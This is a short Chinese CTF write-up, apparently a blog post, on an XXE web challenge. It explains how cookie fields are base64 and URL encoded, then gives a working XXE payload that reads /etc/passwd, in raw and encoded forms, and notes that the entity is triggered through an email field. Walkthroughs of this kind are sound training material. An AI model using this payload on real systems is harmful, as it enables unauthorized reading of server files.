-
小学期,第三场-下午:WEB_xxe
hint:
1.cookie
2.进行了base64编码
抓包查看 Cookie,跟平常的不同,有 version, bracket, bracket2
bracket2 进行了 URL 加密,解回来
base64 解码后,可以看到三者的顺序
顺序应该是 bracket+version+bracket2
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE ANY [<!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
将写好的语句编码
PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48IURPQ1RZUEUgQU5ZIFs8IUVOVElUWSB4eGUgU1lTVEVNICJmaWxlOi8vL2V0Yy9wYXNzd2QiPiBdPg==
URL 编码
PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48IURPQ1RZUEUgQU5ZIFs8IUVOVElUWSB4eGUgU1lTVEVNICJmaWxlOi8vL2V0Yy9wYXNzd2QiPiBdPg%3D%3D
截取三段放在对应位置
&xxe;
URL 编码
%26xxe%3B
需要调用 xxe,找能调用的点
在 email 中可以成功调用
重复以上方法找 flag
-
相关阅读:
若依——地址封装
Java版本+企业电子招投标系统源代码+支持二开+招投标系统+中小型企业采购供应商招投标平台
观察者模式
HashMap在JDK1.7中多线程并发会出现死循环,超详细图解
linux进程间通信之共享内存
VL (Vision and Language) 任务简介及数据集
迅速上手:CentOS 系统下 SSH 服务配置指南
【云原生】设备云之内外组织与管理
frxJSON用法
通信原理学习笔记1:模拟与数字通信系统、通信系统性能指标
- 原文地址:https://blog.csdn.net/qq_62260856/article/details/125524919